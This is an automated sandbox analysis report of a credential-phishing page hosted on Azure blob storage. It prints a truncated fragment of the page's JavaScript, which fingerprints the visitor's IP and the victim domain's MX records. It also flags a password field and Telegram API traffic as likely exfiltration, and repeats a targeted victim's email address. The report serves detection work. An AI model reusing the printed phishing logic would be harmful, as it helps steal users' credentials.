Javascript checks online IP of machine

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...

URL contains potential PII (phishing indication)

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	Sample URL: PII: robert.webber@phillyshipyard.com

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: <input type="password" .../> found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: <input type="password" .../> found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="author".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: No <meta name="author".. found

Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com	HTTP Parser: No <meta name="copyright".. found
Source: https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 4.245.163.56
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: kit.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: image.thum.io
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: dns.google
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49754 version: TLS 1.2

Source: classification engine

Classification label: mal68.phis.troj.win@21/22@46/267

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1944,i,10635967694497959874,8854077005890642596,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

ID:	1571602
Product:	CloudBasic
Start time:	15:04:15
Start date:	09.12.2024
Cookbook:	defaultwindowsinteractivecookbook.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS

Windows Analysis Report
https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com

Overview

General Information

Detection

Signatures

Classification

Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Screenshots

Network Map

Contacted Public IPs

Private

Contacted Domains

Windows Analysis Report
https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.com